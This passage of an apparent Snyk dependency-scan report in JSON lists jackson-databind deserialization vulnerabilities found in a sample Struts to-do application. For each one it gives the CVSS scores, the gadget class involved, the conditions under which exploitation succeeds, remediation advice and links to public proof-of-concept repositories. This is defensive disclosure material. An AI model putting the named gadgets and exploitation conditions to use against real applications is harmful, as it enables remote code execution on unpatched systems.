"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:59:37.319616Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:50:59.448286Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:23.759947Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `oadd.org.apache.commons.dbcp.cpdsadapter.DriverAdapterCPDS`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [Al1ex's Poc](https://github.com/Al1ex/CVE-2020-36179)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3004)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", - "epssDetails": { - "percentile": "0.72318", - "probability": "0.00357", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-36179" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2021-01-07T13:29:22.463416Z", - "functions_new": [ - { - "version": [ - "[,2.9.10.8)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2021-01-07T13:12:59Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2021-01-07T16:40:34Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:23.759947Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - 
"io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056421", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.9.10.8)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.9.10.8" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.10.8)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/issues/3004", - "title": "GitHub Issue" - }, - { - "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "Medium Article" - }, - { - "url": "https://github.com/Al1ex/CVE-2020-36179", - "title": "PoC" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:48:38.913838Z" - }, - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:24.693276Z" - } - ], - "cvssSources": [ - { - "type": 
"primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:59:37.436792Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:38.913838Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:24.693276Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp2.cpdsadapter.DriverAdapterCPDS`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3004)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [PoC](https://github.com/Al1ex/CVE-2020-36179)\n", - "epssDetails": { - "percentile": "0.66225", - "probability": "0.00262", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-36182" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2021-01-07T13:30:54.237288Z", - "functions_new": [ - { - "version": [ - "[,2.9.10.8)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2021-01-07T13:30:00Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2021-01-07T16:40:35Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:24.693276Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - 
"io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056424", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.9.10.8)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.9.10.8" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.10.8)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2998", - "title": "GitHub Issue" - }, - { - "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "Medium Article" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:48:39.244182Z" - }, - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:01.307628Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - 
"assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:59:37.622591Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:39.244182Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:01.307628Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp2.datasources.SharedPoolDataSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2998)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", - "epssDetails": { - "percentile": "0.66225", - "probability": "0.00262", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-36185" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2021-01-07T13:36:40.536722Z", - "functions_new": [ - { - "version": [ - "[,2.9.10.8)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2021-01-07T13:34:52Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2021-01-07T16:40:33.303463Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:01.307628Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - 
"io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056425", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[, 2.9.10.8)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.9.10.8" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.10.8)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2996", - "title": "GitHub Issue" - }, - { - "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "Medium Article" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:00.658291Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:23.824076Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - 
"baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:59:42.513059Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:00.658291Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:23.824076Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `com.newrelic.agent.deps.ch.qos.logback.core.db.DriverManagerConnectionSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2996)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", - "epssDetails": { - "percentile": "0.66225", - "probability": "0.00262", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-36189" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2021-01-07T13:37:54.679882Z", - "functions_new": [ - { - "version": [ - "[,2.9.10.8)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2021-01-07T13:37:04Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2021-01-07T16:40:33.089230Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:23.824076Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - 
"io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056426", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.9.10.8)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.9.10.8" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.10.8)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2996", - "title": "GitHub Issue" - }, - { - "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "Medium Article" - }, - { - "url": "https://github.com/Al1ex/CVE-2020-36188", - "title": "PoC" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:48:38.922274Z" - }, - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:03.468032Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": 
"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:59:42.488317Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:38.922274Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:03.468032Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `com.newrelic.agent.deps.ch.qos.logback.core.db.JNDIConnectionSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
